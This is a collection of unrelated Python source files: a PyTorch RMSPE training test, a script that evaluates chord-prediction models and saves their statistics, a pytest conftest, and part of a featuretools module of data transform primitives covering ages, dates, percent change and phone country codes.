def rmspe_func(y_pred, y):
"Return y_pred and y to non-log space and compute RMSPE"
y_pred, y = torch.exp(y_pred) - 1, torch.exp(y) - 1
pct_var = (y_pred - y) / y
return (pct_var ** 2).mean().pow(0.5)
train_loss, y_pred, y = process_epoch(
data_itr,
model,
train=True,
optimizer=optimizer,
# transform=batch_transform,
amp=False,
)
train_rmspe = None
train_rmspe = rmspe_func(y_pred, y)
assert train_rmspe is not None
assert len(y_pred) > 0
assert len(y) > 0
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jun 7 11:51:53 2019
@author: carsault
"""
#%%
import pickle
import torch
from utilities import chordUtil
from utilities.chordUtil import *
from utilities import testFunc
from utilities.testFunc import *
from utilities import distance
from utilities.distance import *
from ACE_Analyzer import ACEAnalyzer
from ACE_Analyzer.ACEAnalyzer import *
import numpy as np
import time
#time.sleep(3600)
# CUDA for PyTorch
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
dtype = torch.cuda.FloatTensor
foldName = "modelSave200908"
#modelType = ["mlpDecim", "mlpDecimKey", "mlpDecimBeat", "mlpDecimKeyBeat","mlpDecimAug","mlpDecimFamily"]
#modelType = ["lstmDecim"]
modelType = ["mlpDecimAug"]
randm = [1, 2, 3, 4, 5]
#alpha = ['functional']
alpha = ['a0','a2','a5','functional']
maxRepList = [1]
alphaRep = ["Nope","alphaRep"]
dictKey, listKey = chordUtil.getDictKey()
correctDown = [0]*4
correctPos = [0]*8
totalDown = [0]*4
totalPos = [0]*8
musicalDist2 = 0
musicalDist4 = 0
dictFinalRes = {}
specName = ""
#test
#modelType = ["mlpDecim"]
#foldName = "modelSave190515"
#randm = [1]
#alpha = ['a0']
#%%
def perplexityAccumulate(res, y, sPrev, nby ,one_hot = False):
s = 0
oneHot = []
if one_hot == True:
for i in range(len(y)):
oneHot.append(y[i].index(max(y[i])))
else:
oneHot = y
for r, t in zip(res,oneHot):
s += np.log2(r[t])
sPrev += s
nby += len(y)
return sPrev, nby
def perplexityCompute(s,y):
s /= -y
return 2 ** s
#%%
def perplexity(res, y, one_hot = False):
s = 0
oneHot = []
if one_hot == True:
for i in range(len(y)):
oneHot.append(y[i].index(max(y[i])))
else:
oneHot = y
for r, t in zip(res,oneHot):
s += np.log2(r[t])
s /= -len(y)
return 2 ** s
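# Worked example (as comments): a uniform two-class predictor,
#   perplexity([[0.5, 0.5], [0.5, 0.5]], [0, 1])
# gives s = log2(0.5) + log2(0.5) = -2, then s /= -len(y) -> 1, so 2**1 = 2.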
#%%
for alph in alpha:
for model in modelType:
if model == "mlpDecimFamily":
str1 = "124"
else:
str1 = "1"
for maxReps in maxRepList:
if maxReps == 1:
alphaRep = "Nope"
else:
alphaRep = "alphaRep"
#if maxReps == 1 or model == "mlpDecim" or model == "mlpDecimAug" or model == "lstmDecim":
if maxReps == 1 or model == "mlpDecim" or model == "mlpDecimAug":
print("\n------\n------\nResult for " + model + "on alphabet " + alph + "\n------\n------\n")
perp = []
rank = []
totRank = []
#Analyzer = ACEAnalyzer()
if alph != "functional":
dictChord, listChord = chordUtil.getDictChord(eval(alph))
distMat = testFunc.computeMat(dictChord, "euclidian")
#if alphaRep == "alphaRep":
# dictChord, listChord = chordUtil.getDictChordUpgrade(eval(alph), maxReps)
dictKeyChord = {}
dictKeyChordAll = {}
for key in dictKey:
dictKeyChord[key] = np.zeros(len(listChord))
dictKeyChordAll[key] = np.zeros(len(listChord))
Analyzer = ACEAnalyzer()
AnalyzerDiat = ACEAnalyzer()
AnalyzerNoDiat = ACEAnalyzer()
if alph == "a0":
dictFun = relatif
totAcc = []
totAccRepeat = []
totAccDiat = []
totAccNoDiat = []
totKey= []
totDownbeat = []
totAccFun = []
totAcca0 = []
totAccDiat = []
totAccNoDiat = []
totAccDownbeat = []
totAccPos = []
totAccBeatPos = []
totDist = []
predTotDist = []
totDistPred = []
totDist2a = []
totDist4a = []
totDist2b = []
totDist4b = []
totDist2c = []
totDist4c = []
nbCorrectChordDiat = 0
nbCorrectChordNoDiat = 0
nbTotalDiat = 0
nbTotalNoDiat = 0
for rand in randm:
'''
sumPred2ab = np.zeros(len(listChord))
sumTarg2ab = np.zeros(len(listChord))
sumPred4ab = np.zeros(len(listChord))
sumTarg4ab = np.zeros(len(listChord))
sumPred2c = np.zeros(len(listChord))
sumTarg2c = np.zeros(len(listChord))
sumPred4c = np.zeros(len(listChord))
sumTarg4c = np.zeros(len(listChord))
'''
correctDown = [0]*4
correctPos = [0]*8
totalDown = [0]*4
totalPos = [0]*8
correctBeatPos = np.zeros((4,8))
totalBeatPos = np.zeros((4,8))
accBeatPos = np.zeros((4,8))
musicalDist = 0
predMusicalDist = 0
acc2correct = 0
acc4correct = 0
musicalDist2a = 0
musicalDist4a = 0
musicalDist2b = 0
musicalDist4b = 0
musicalDist2c = 0
musicalDist4c = 0
#zerr = np.zeros(len(dictChord))
total = 0
totalRepeat = 0
totalDiat = 0
totalNoDiat = 0
acc = 0
accRepeat = 0
accDiat = 0
accNoDiat = 0
correct = 0
correctDiat = 0
correctNoDiat = 0
keycorrect = 0
downbeatcorrect = 0
correctReducFunc = 0
correctReduca0 = 0
#dataFolder = alph + "_1_" + str(rand)
if alphaRep == "alphaRep":
dataFolder = alph + "_1_" + str(rand) + "newRep" + str(maxReps)
else:
dataFolder = alph + "_124_" + str(rand)
#modelName = dataFolder + "_" + str1 + "_" + model + specName
if modelType == "mlpDecimFamily":
modelName = dataFolder + "_124_" + model + specName
else:
modelName = dataFolder + "_" + str1 + "_" + model + specName
#with open("testVector/" + foldName + '/' + modelName + '/' + "probVect_" + modelName + "_test.pkl", 'rb') as fp:
with open(foldName + '/' + modelName + '/' + "res" + modelName + ".pkl", 'rb') as fp:
dictDat = pickle.load(fp)
#dictDat["X"] = dictDat["X"].cpu().numpy()
#dictDat["y"] = dictDat["y"].cpu().numpy()
totKey.append(dictDat["bestAccurKeyTest"])
totAccDownbeat.append(dictDat["bestAccurBeatTest"])
'''
if alph != "functional":
#musicalDist = np.sum(np.matmul(dictDat["X"], distMat) * dictDat["y"])
musicalDist = 0
for i in range(len(dictDat["X"])):
pred = np.argmax(dictDat["X"][i])
tgt = np.argmax(dictDat["y"][i])
# rank of the chords
rank.append(len(np.where(dictDat["X"][i] > dictDat["X"][i][tgt])[0]) + 1)
total += 1
totalDown[dictDat["beat"][i]] += 1
totalPos[dictDat["pos"][i]] += 1
totalBeatPos[dictDat["beat"][i],dictDat["pos"][i]] += 1
# Accuracy:
if pred == tgt:
correct += 1
correctDown[dictDat["beat"][i]] += 1
correctPos[dictDat["pos"][i]] += 1
correctBeatPos[dictDat["beat"][i],dictDat["pos"][i]] += 1
#if alphaRep != "alphaRep":
# predMusicalDist += distMat[pred][tgt]
if alph != "functional":
predF = dictFun[reduChord(listChord[pred], alpha= 'a0', transp = 0)]
tgtF = dictFun[reduChord(listChord[tgt], alpha= 'a0', transp = 0)]
if predF == tgtF:
correctReducFunc +=1
if alph != "functional" and alph != "a0":
preda0 = reduChord(listChord[pred], alpha= 'a0', transp = 0)
tgta0 = reduChord(listChord[tgt], alpha= 'a0', transp = 0)
if preda0 == tgta0:
correctReduca0 +=1
if alph != "functional":
Analyzer.compare(chord = listChord[pred], target = listChord[tgt], key = listKey[dictDat["key"][i]], base_alpha = a5, print_comparison = False)
root_target, qual_target = parse_mir_label(listChord[tgt])
root_target = normalized_note(root_target)
root_target, qual_target = functional_tetrad(root_target, qual_target, listKey[dictDat["key"][i]], base_alpha = a5)
degree_target = degree(root_target, qual_target, listKey[dictDat["key"][i]])
if degree_target == "non-diatonic":
nbTotalNoDiat += 1
AnalyzerNoDiat.compare(chord = listChord[pred], target = listChord[tgt], key = listKey[dictDat["key"][i]], base_alpha = a5, print_comparison = False)
totalNoDiat += 1
dictKeyChordAll[listKey[dictDat["key"][i]]][tgt] += 1
if pred == tgt:
correctNoDiat += 1
# histogramm for each key on non diatonic target
dictKeyChord[listKey[dictDat["key"][i]]][tgt] += 1
nbCorrectChordNoDiat += 1
else:
AnalyzerDiat.compare(chord = listChord[pred], target = listChord[tgt], key = listKey[dictDat["key"][i]], base_alpha = a5, print_comparison = False)
totalDiat += 1
nbTotalDiat += 1
if pred == tgt:
correctDiat += 1
nbCorrectChordDiat += 1
if model == "mlpDecimAug" or model == "mlpDecimAugUp":
if dictDat["key"][i] == dictDat["keyPred"][i]:
keycorrect += 1
if dictDat["beat"][i] == dictDat["beatPred"][i]:
downbeatcorrect += 1
#sPrev, nby = perplexityAccumulate(dictDat["X"].tolist(), dictDat["y"].tolist(), sPrev, nby, True)
perp.append(perplexity(dictDat["X"].tolist(), dictDat["y"].tolist(), True))
totRank.append(np.mean(rank))
rank = []
acc = correct/total
keyacc = keycorrect/total
downbeatacc = downbeatcorrect/total
if alph != "functional":
accDiat = correctDiat/totalDiat
accNoDiat = correctNoDiat/totalNoDiat
accDownbeat = [int(b) / int(m) for b,m in zip(correctDown, totalDown)]
accPos = [int(b) / int(m) for b,m in zip(correctPos, totalPos)]
for i in range(len(totalBeatPos)):
accBeatPos[i] = [int(b) / int(m) for b,m in zip(correctBeatPos[i], totalBeatPos[i])]
totAcc.append(acc)
totAccDiat.append(accDiat)
totAccNoDiat.append(accNoDiat)
totKey.append(keyacc)
totDownbeat.append(downbeatacc)
if alph != "functional":
accFun = correctReducFunc/total
totAccFun.append(accFun)
if alph != "functional":
acca0 = correctReduca0/total
totAcca0.append(acca0)
'''
'''
totAcc2.append(acc2)
totAcc4.append(acc4)
totAccDownbeat.append(accDownbeat)
totAccPos.append(accPos)
totAccBeatPos.append(accBeatPos)
'''
'''
if alph != "functional":
totDist.append(musicalDist/total)
predTotDist.append(predMusicalDist/total)
'''
            # Printing time!
#perp = perplexityCompute(sPrev, nby)
"""
f = open("histo_output/" + model + "_" + alph + "_" + str(maxReps) + "histoChord.txt","w")
for key, value in dictKeyChord.items():
f.write("Histogramme on key : " + key + "\n")
for nBchord in range(len(value)):
f.write(listChord[nBchord] + ' = ' + str(value[nBchord])+ "\n")
f.write("\n\n")
f.close()
f = open("histo_output/" + model + "_" + alph + "_" + str(maxReps) + "histoChordAll.txt","w")
for key, value in dictKeyChordAll.items():
f.write("Histogramme on key : " + key + "\n")
for nBchord in range(len(value)):
f.write(listChord[nBchord] + ' = ' + str(value[nBchord])+ "\n")
f.write("\n\n")
f.close()
f = open("histo_output/" + model + "_" + alph + "_" + str(maxReps) + "histoChordRatio.txt","w")
for key, value in dictKeyChordAll.items():
f.write("Histogramme on key : " + key + "\n")
for nBchord in range(len(value)):
if value[nBchord] != 0:
f.write(listChord[nBchord] + ' = ' + str(dictKeyChord[key][nBchord]/value[nBchord])+ "\n")
f.write("\n\n")
f.close()
#save as pickle
f = open("histo_output/" + model + "_" + alph + "_" + str(maxReps) + "histoChord.pkl","wb")
pickle.dump(dictKeyChord,f)
f.close()
#save as pickle
f = open("histo_output/" + model + "_" + alph + "_" + str(maxReps) + "histoChordAll.pkl","wb")
pickle.dump(dictKeyChordAll,f)
f.close()
print("nbCorrectChordDiat :" + str(nbCorrectChordDiat))
print("nbCorrectChordNoDiat :" + str(nbCorrectChordNoDiat))
print("nbTotalDiat :" + str(nbTotalDiat))
print("nbTotalNoDiat :" + str(nbTotalNoDiat))
print("rank for " + model + " on alphabet " + alph + ": " + str(np.mean(totRank)))
print("perp for " + model + " on alphabet " + alph + ": " + str(np.mean(perp)))
print("acc for " + model + " on alphabet " + alph + ": " + str(np.mean(totAcc)))
print("accDiat for " + model + " on alphabet " + alph + ": " + str(np.mean(totAccDiat)))
print("accNoDiat for " + model + " on alphabet " + alph + ": " + str(np.mean(totAccNoDiat)))
if alph != "functional":
print("accFun for " + model + " on alphabet " + alph + ": " + str(np.mean(totAccFun)))
if alph != "functional" and alph != "a0":
print("acca0 for " + model + " on alphabet " + alph + ": " + str(np.mean(totAcca0)))
print("rank_std for " + model + " on alphabet " + alph + ": " + str(np.std(totRank)))
print("perp_std for " + model + " on alphabet " + alph + ": " + str(np.std(perp)))
print("acc_std for " + model + " on alphabet " + alph + ": " + str(np.std(totAcc)))
print("accDiat_std for " + model + " on alphabet " + alph + ": " + str(np.std(totAccDiat)))
print("accNoDiat_std for " + model + " on alphabet " + alph + ": " + str(np.std(totAccNoDiat)))
if alph != "functional":
print("accFun_std for " + model + " on alphabet " + alph + ": " + str(np.std(totAccFun)))
if alph != "functional" and alph != "a0":
print("acca0_std for " + model + " on alphabet " + alph + ": " + str(np.std(totAcca0)))
#print("acc2 for " + model + " on alphabet " + alph + ": " + str(np.mean(totAcc2)))
#print("acc4 for " + model + " on alphabet " + alph + ": " + str(np.mean(totAcc4)))
print("accDownbeat for " + model + " on alphabet " + alph + ": " + str(np.average(totAccDownbeat,axis=0)))
print("accPos for " + model + " on alphabet " + alph + ": " + str(np.average(totAccPos,axis=0)))
print("accBeatPos for " + model + " on alphabet " + alph + ": " + str(np.average(totAccBeatPos, axis = 0)))
"""
'''
if alph != "functional":
print("Average Musical Distance for " + model + " on alphabet " + alph + ": " + str(np.mean(totDist)))
print("Average Prediction Musical Distance for " + model + " on alphabet " + alph + ": " + str(np.mean(predTotDist)))
if model == "mlpDecimAug" or model == "mlpDecimAugUp":
print("accKey for " + model + " on alphabet " + alph + ": " + str(np.mean(totKey)))
print("accBeat for " + model + " on alphabet " + alph + ": " + str(np.mean(totDownbeat)))
print("accKey_std for " + model + " on alphabet " + alph + ": " + str(np.std(totKey)))
print("accBeat_std for " + model + " on alphabet " + alph + ": " + str(np.std(totDownbeat)))
'''
dictModel = {}
dictCurrent = {}
#basic info
#dictModel["numParam"] = dictDat["numParam"]
#dictModel["alpha"] = dictDat["alpha"]
#dictModel["modelType"] = dictDat["modelType"]
dictModel["key"] = np.mean(totKey)
dictModel["key_std"] = np.std(totKey)
dictModel["beat"] = np.mean(totDownbeat)
dictModel["beat_std"] = np.std(totDownbeat)
print("accKey for " + model + " on alphabet " + alph + ": " + str(np.mean(totKey)))
print("accBeat for " + model + " on alphabet " + alph + ": " + str(np.mean(totDownbeat)))
print("accKey_std for " + model + " on alphabet " + alph + ": " + str(np.std(totKey)))
print("accBeat_std for " + model + " on alphabet " + alph + ": " + str(np.std(totDownbeat)))
'''
dictModel["perp"] = np.mean(perp)
dictModel["acc"] = np.mean(totAcc)
dictModel["rank_std"] = np.std(totRank)
dictModel["perp_std"] = np.std(perp)
dictModel["acc_std"] = np.std(totAcc)
#diat info
dictModel["accDiat"] = np.mean(totAccDiat)
dictModel["accNoDiat"] = np.mean(totAccNoDiat)
dictModel["accDiat_std"] = np.std(totAccDiat)
dictModel["accNoDiat_std"] = np.std(totAccNoDiat)
#reductionInfo
if alph != "functional":
dictModel["accFun"] = np.mean(totAccFun)
dictModel["accFun_std"] = np.std(totAccFun)
if alph != "functional" and alph != "a0":
dictModel["acca0"] = np.mean(totAcca0)
dictModel["acca0_std"] = np.std(totAcca0)
#position info
dictModel["accDownbeat"] = np.average(totAccDownbeat,axis=0)
dictModel["accPos"] = np.average(totAccPos,axis=0)
dictModel["accBeatPos"] = np.average(totAccBeatPos, axis = 0)
#Key beat info
if model == "mlpDecimAug" or model == "mlpDecimAugUp":
dictModel["accKey"] = np.mean(totKey)
dictModel["accBeat"] = np.mean(totDownbeat)
dictModel["accKey_std"] = np.std(totKey)
dictModel["accBeat_std"] = np.std(totDownbeat)
if alph != "functional":
dictModel["MusicalDist"] = np.mean(totDist)
dictModel["PredMusicalDist"] = np.mean(predTotDist)
dictACE_stats = {}
dictACE_degs = {}
for anal, anal_name in zip([Analyzer, AnalyzerDiat, AnalyzerNoDiat],['all chords', 'diatonic target', 'non-diatonic target']):
dictACE_stats_cur = {}
dictACE_degs_cur = {}
print("\n------\nSTATS for chord present in :" + anal_name+ "\n------")
StatsErrorsSubstitutions = anal.stats_errors_substitutions(stats_on_errors_only = True)
print("\nSTATS ERROR SUBSTITUTIONS:\n------")
print("Errors explained by substitutions rules: {}% of total errors\n------".format(round(anal.total_errors_explained_by_substitutions*100.0/anal.total_errors,2)))
print("DETAIL ERRORS EXPLAINED BY SUBSTITUTION RULES:")
for error_type, stat in StatsErrorsSubstitutions.items():
#if stat*100 > 1:
dictACE_stats_cur[error_type] = stat
if stat*100 > 1:
print("{}: {}%".format(error_type, round(100*stat, 2)))
# print(Analyzer.total_errors_degrees)
# print(Analyzer.total_errors_when_non_diatonic_target)
# print(Analyzer.total_non_diatonic_target)
# print(Analyzer.degrees_analysis)
StatsErrorsDegrees = anal.stats_errors_degrees(stats_on_errors_only = True)
print("\nSTATS ERROR DEGREES:\n------")
if anal_name != "diatonic target":
print("Errors when the target is not diatonic: {}% ".format(round(anal.total_errors_when_non_diatonic_target*100.0/anal.total_non_diatonic_target,2)))
print("Non diatonic target in {}% of the total errors".format(round(anal.total_errors_when_non_diatonic_target*100.0/anal.total_errors,2)))
print("When relevant: incorrect degrees (modulo inclusions): {}% of total errors\n------".format(round(anal.total_errors_degrees*100.0/anal.total_errors,2)))
print("DETAIL ERRORS OF DEGREES (modulo inclusions) WHEN THE TARGET IS DIATONIC:")
for error_type, stat in StatsErrorsDegrees.items():
#if stat*100 > 1:
dictACE_degs_cur[error_type] = stat
if stat*100 > 1:
print("{}: {}%".format(error_type, round(100*stat,2)))
dictACE_stats[anal_name] = dictACE_stats_cur
dictACE_degs[anal_name] = dictACE_degs_cur
#dictModel["MusicalDist2a"] = np.mean(totDist2a)
#dictModel["MusicalDist4a"] = np.mean(totDist4a)
#dictModel["MusicalDist2b"] = np.mean(totDist2b)
#dictModel["MusicalDist4b"] = np.mean(totDist4b)
#dictModel["MusicalDist2c"] = np.mean(totDist2c)
#dictModel["MusicalDist4c"] = np.mean(totDist4c)
#dictFinalRes[model + "_" + alph] = dictModel
dictCurrent["res"] = dictModel
dictCurrent["stats"] = dictACE_stats
dictCurrent["degs"] = dictACE_degs
dictFinalRes[model + "_" + alph + "_" + str(maxReps)] = dictCurrent
print("\n\n")
'''
dictCurrent["res"] = dictModel
dictFinalRes[model + "_" + alph + "_" + str(maxReps)] = dictCurrent
#dictFinalRes = dictFinalRes.cpu()
sauv = open(foldName + "_DictFinaltest_keyBeat.pkl","wb")
pickle.dump(dictFinalRes,sauv)
sauv.close()
print("analyses completed")
#%%
|
import pytest
from antidote import config, is_compiled
config.auto_detect_type_hints_locals = True
def pytest_runtest_setup(item):
if any(mark.name == "compiled_only" for mark in item.iter_markers()):
if not is_compiled():
pytest.skip("Compiled only test.")
|
from collections import deque
from featuretools.variable_types.variable import Discrete
import warnings
import numpy as np
import string
import pandas
import re
import math
from datetime import datetime, timedelta
from pyzipcode import ZipCodeDatabase
from pandas import Series
from scipy.signal import savgol_filter
from scipy.stats import stats
from phone_iso3166.country import phone_country
from nltk.corpus import stopwords
from nltk.sentiment.vader import SentimentIntensityAnalyzer
from featuretools.primitives.base.transform_primitive_base import (
TransformPrimitive
)
from featuretools.utils import convert_time_units
from featuretools.utils.entity_utils import replace_latlong_nan
from featuretools.utils.gen_utils import Library
from featuretools.variable_types import (
Boolean,
Categorical,
DateOfBirth,
Datetime,
DatetimeTimeIndex,
LatLong,
NaturalLanguage,
Numeric,
Ordinal,
PhoneNumber,
SubRegionCode,
URL,
Variable,
ZIPCode
)
class AbsoluteDiff(TransformPrimitive):
"""Computes the absolute diff of a number.
Examples:
>>> absdiff = AbsoluteDiff()
>>> absdiff([3.0, -5.0, -2.4]).tolist()
[nan, 8.0, 2.6]
"""
name = "absolute_diff"
input_types = [Numeric]
return_type = Numeric
compatibility = [Library.PANDAS, Library.DASK, Library.KOALAS]
description_template = "the absolute diff of {}"
def get_function(self):
def func_absdiff(values):
return np.absolute(np.diff(values, prepend=float('nan')))
return func_absdiff
class AgeOverN(TransformPrimitive):
input_types = [DateOfBirth]
return_type = Boolean
uses_calc_time = True
compatibility = [Library.PANDAS, Library.DASK]
def get_function_helper(self, overN):
def age(x, time=None):
return (time - x).dt.days / 365 > overN
return age
class AgeOver18(AgeOverN):
"""Determines whether a person is over 18 years old given their date of birth.
Description:
Returns True if the person's age is greater than or equal to 18 years.
Returns False if the age is less than 18 years of age.
        Returns nan if the age is not defined or doesn't exist.
Examples:
Determine whether someone born on Jan 1, 2000 is over 18 years old as of January 1, 2019.
>>> import pandas as pd
>>> reference_date = pd.to_datetime("01-01-2019")
>>> age_over_18 = AgeOver18()
>>> input_ages = [pd.to_datetime("01-01-2000"), pd.to_datetime("06-01-2010")]
>>> age_over_18(input_ages, time=reference_date).tolist()
[True, False]
"""
name = "age_over_18"
description_template = "the age over 18 from {}"
def get_function(self):
return AgeOverN.get_function_helper(self, 18)
class AgeOver25(AgeOverN):
"""Determines whether a person is over 25 years old given their date of birth.
Description:
Returns True if the person's age is greater than or equal to 25 years.
Returns False if the age is less than 25 years of age.
        Returns nan if the age is not defined or doesn't exist.
Examples:
Determine whether someone born on Jan 1, 2000 is over 25 years old as of January 1, 2019.
>>> import pandas as pd
>>> reference_date = pd.to_datetime("01-01-2019")
>>> age_over_25 = AgeOver25()
>>> input_ages = [pd.to_datetime("01-01-2000"), pd.to_datetime("06-01-1990")]
>>> age_over_25(input_ages, time=reference_date).tolist()
[False, True]
"""
name = "age_over_25"
description_template = "the age over 25 from {}"
def get_function(self):
return AgeOverN.get_function_helper(self, 25)
class AgeOver65(AgeOverN):
"""Determines whether a person is over 65 years old given their date of birth.
Description:
Returns True if the person's age is greater than or equal to 65 years.
Returns False if the age is less than 65 years of age.
        Returns nan if the age is not defined or doesn't exist.
Examples:
Determine whether someone born on Jan 1, 1950 is over 65 years old as of January 1, 2019.
>>> import pandas as pd
>>> reference_date = pd.to_datetime("01-01-2019")
>>> age_over_65 = AgeOver65()
>>> input_ages = [pd.to_datetime("01-01-1950"), pd.to_datetime("01-01-2000")]
>>> age_over_65(input_ages, time=reference_date).tolist()
[True, False]
"""
name = "age_over_65"
description_template = "the age over 65 from {}"
def get_function(self):
return AgeOverN.get_function_helper(self, 65)
class AgeUnderN(TransformPrimitive):
input_types = [DateOfBirth]
return_type = Boolean
uses_calc_time = True
compatibility = [Library.PANDAS, Library.DASK]
description_template = "the age under 18 from {}"
def get_function_helper(self, underN):
def age(x, time=None):
return (time - x).dt.days / 365 < underN
return age
class AgeUnder18(AgeUnderN):
"""Determines whether a person is under 18 years old given their date of birth.
Description:
Returns True if the person's age is less than 18 years.
Returns False if the age is more than or equal to 18 years.
Returns np.nan if the age is not defined, or doesn't exist.
Examples:
Determine whether someone born on Jan 1, 2000 is under 18 years old as of January 1, 2019.
        >>> import pandas as pd
>>> reference_date = pd.to_datetime("01-01-2019")
>>> age_under_18 = AgeUnder18()
>>> input_ages = [pd.to_datetime("01-01-2000"), pd.to_datetime("06-01-2010")]
>>> age_under_18(input_ages, time=reference_date).tolist()
[False, True]
"""
name = "age_under_18"
description_template = "the age under 18 from {}"
def get_function(self):
return AgeUnderN.get_function_helper(self, 18)
class AgeUnder65(AgeUnderN):
"""Determines whether a person is under 65 years old given their date of birth.
Description:
Returns True if the person's age is less than 65 years.
Returns False if the age is more than or equal to 65 years.
Returns np.nan if the age is not defined, or doesn't exist.
Examples:
Determine whether two people are under age 65 as of January 1, 2019.
>>> import pandas as pd
>>> reference_date = pd.to_datetime("01-01-2019")
>>> age_under_65 = AgeUnder65()
>>> input_ages = [pd.to_datetime("01-01-1950"),
... pd.to_datetime("06-01-2010")]
>>> age_under_65(input_ages, time=reference_date).tolist()
[False, True]
"""
name = "age_under_65"
description_template = "the age under 65 from {}"
def get_function(self):
return AgeUnderN.get_function_helper(self, 65)
class NaturalLanguageToYear(TransformPrimitive):
"""Extracts the year from a string
Description:
If a year is present in a string, extract the year.
This will only match years between 1800 and 2199.
        Years will not be extracted if immediately preceded or followed by another number or letter.
If there are multiple years present in a string, only the first year will be returned.
Examples:
        >>> import pandas as pd
        >>> text_to_year = NaturalLanguageToYear()
        >>> array = pd.Series(["The year was 1887.",
... "This string has no year",
... "Toy Story (1995)",
... "12451997abc"])
>>> text_to_year(array).tolist()
['1887', nan, '1995', nan]
"""
name = "natural_language_to_year"
input_types = [NaturalLanguage]
return_type = Ordinal
description_template = "the year from {}"
def get_function(self):
def lang_to_year(values):
result = []
for value in values:
                numbers = re.findall(r'\d+', value)
find = False
for number in numbers:
if 1800 <= int(number) < 2200:
result.append(int(number))
find = True
break
if not find:
result.append(np.nan)
return np.array(result)
return lang_to_year
class NthWeekOfMonth(TransformPrimitive):
"""Determines the nth week of the month from a given date.
Description:
        Converts a datetime to a float representing the week of the month in which the date falls.
The first day of the month starts week 1, and the week number is incremented each Sunday.
Examples:
>>> from datetime import datetime
>>> nth_week_of_month = NthWeekOfMonth()
>>> times = [datetime(2019, 3, 1),
... datetime(2019, 3, 3),
... datetime(2019, 3, 31),
... datetime(2019, 3, 30)]
>>> nth_week_of_month(times).tolist()
[1.0, 2.0, 6.0, 5.0]
"""
name = "nth_week_of_month"
input_types = [Datetime]
return_type = Numeric
description_template = "the nth week of the month from {}"
def get_function(self):
def nth_week(dates):
result = []
for date in dates:
first_day = date.replace(day=1)
if first_day.weekday() < 6:
first_day = first_day - timedelta(days=first_day.weekday()+1)
result.append((date - first_day).days // 7 + 1)
return np.array(result)
return nth_week
class PartOfDay(TransformPrimitive):
"""Determines what part of the day a particular time value falls in.
Description:
Given a list of datetimes, determine part of day based on the hour.
The options are: Morning (5am-11am), Afternoon (12pm-5pm), Evening (6pm-9pm), or Night (10pm-4am).
If the date is missing, return `NaN`.
Examples:
>>> from datetime import datetime
>>> part_of_day = PartOfDay()
>>> times = [datetime(2010, 1, 1, 1, 45, 0),
... datetime(2010, 1, 1, 8, 55, 15),
... datetime(2010, 1, 1, 16, 55, 15),
... datetime(2010, 1, 1, 23, 57, 30)]
>>> part_of_day(times).tolist()
['Night', 'Morning', 'Afternoon', 'Night']
"""
name = "part_of_day"
input_types = [Datetime]
return_type = Categorical
description_template = "what part of the day {} falls in"
def get_function(self):
def part_of_day(values):
result = []
for value in values:
hour = value.hour
if 5 <= hour <= 11:
result.append('Morning')
elif 12 <= hour <= 17:
result.append('Afternoon')
elif 18 <= hour <= 21:
result.append('Evening')
else:
result.append('Night')
return np.array(result)
return part_of_day
class PercentChange(TransformPrimitive):
"""Determines the percent difference between values in a list.
Description:
Given a list of numbers, return the percent difference between each subsequent number.
Percentages are shown in decimal form (not multiplied by 100).
Args:
periods (int) : Periods to shift for calculating percent change.
Default is 1.
fill_method (str) : Method for filling gaps in reindexed Series.
Valid options are `backfill`, `bfill`, `pad`, `ffill`.
`pad / ffill`: fill gap with last valid observation.
`backfill / bfill`: fill gap with next valid observation.
Default is `pad`.
limit (int) : The max number of consecutive NaN values in a gap that can be filled.
Default is None.
        freq (DateOffset, timedelta, or str) : Instead of calculating change between subsequent points, PercentChange will calculate change between points with a certain interval between their date indices.
`freq` defines the desired interval.
When freq is used, the resulting index will also be filled to include any missing dates from the specified interval.
If the index is not date/datetime and freq is used, it will raise a NotImplementedError.
If freq is None, no changes will be applied.
Default is None
Examples:
>>> percent_change = PercentChange()
>>> percent_change([2, 5, 15, 3, 3, 9, 4.5]).to_list()
[nan, 1.5, 2.0, -0.8, 0.0, 2.0, -0.5]
We can control the number of periods to return the percent difference between points further from one another.
>>> percent_change_2 = PercentChange(periods=2)
>>> percent_change_2([2, 5, 15, 3, 3, 9, 4.5]).to_list()
[nan, nan, 6.5, -0.4, -0.8, 2.0, 0.5]
We can control the method used to handle gaps in data.
>>> percent_change = PercentChange()
>>> percent_change([2, 4, 8, None, 16, None, 32, None]).to_list()
[nan, 1.0, 1.0, 0.0, 1.0, 0.0, 1.0, 0.0]
>>> percent_change_backfill = PercentChange(fill_method='backfill')
>>> percent_change_backfill([2, 4, 8, None, 16, None, 32, None]).to_list()
[nan, 1.0, 1.0, 1.0, 0.0, 1.0, 0.0, nan]
We can control the maximum number of NaN values to fill in a gap.
>>> percent_change = PercentChange()
>>> percent_change([2, None, None, None, 4]).to_list()
[nan, 0.0, 0.0, 0.0, 1.0]
>>> percent_change_limited = PercentChange(limit=2)
>>> percent_change_limited([2, None, None, None, 4]).to_list()
[nan, 0.0, 0.0, nan, nan]
We can specify a date frequency on which to calculate percent change.
>>> import pandas as pd
>>> dates = pd.DatetimeIndex(['2018-01-01', '2018-01-02', '2018-01-03', '2018-01-05'])
>>> x_indexed = pd.Series([1, 2, 3, 4], index=dates)
>>> percent_change = PercentChange()
>>> percent_change(x_indexed).to_list()
[nan, 1.0, 0.5, 0.33333333333333326]
>>> date_offset = pd.tseries.offsets.DateOffset(1)
>>> percent_change_freq = PercentChange(freq=date_offset)
>>> percent_change_freq(x_indexed).to_list()
[nan, 1.0, 0.5, nan]
"""
name = "percent_change"
input_types = [Numeric]
return_type = Numeric
description_template = "the percent difference between values in {}"
def __init__(self, periods=1, fill_method='pad', limit=None, freq=None):
self.periods = periods
self.fill_method = fill_method
self.limit = limit
self.freq = freq
def get_function(self):
def pct_change(values):
return values.pct_change(periods=self.periods, fill_method=self.fill_method, limit=self.limit, freq=self.freq)
return pct_change
class PhoneNumberToCountry(TransformPrimitive):
"""Determines the country of a phone number.
Description:
Given a list of phone numbers, return the country of each one, based on the country code.
If a phone number is missing or invalid, return np.nan.
Examples:
>>> phone_number_to_country = PhoneNumberToCountry()
>>> phone_number_to_country(['+55 85 5555555', '+81 55-555-5555', '+1-541-754-3010',]).tolist()
['BR', 'JP', 'US']
"""
name = "phone_number_to_country"
input_types = [PhoneNumber]
return_type = Categorical
description_template = "the country of {}"
def get_function(self):
def phone_to_country(values):
result = []
for value in values:
result.append(phone_country(value))
return np.array(result)
return phone_to_country
class PolarityScore(TransformPrimitive):
"""Calculates the polarity of a text on a scale from -1 (negative) to 1 (positive)
Description:
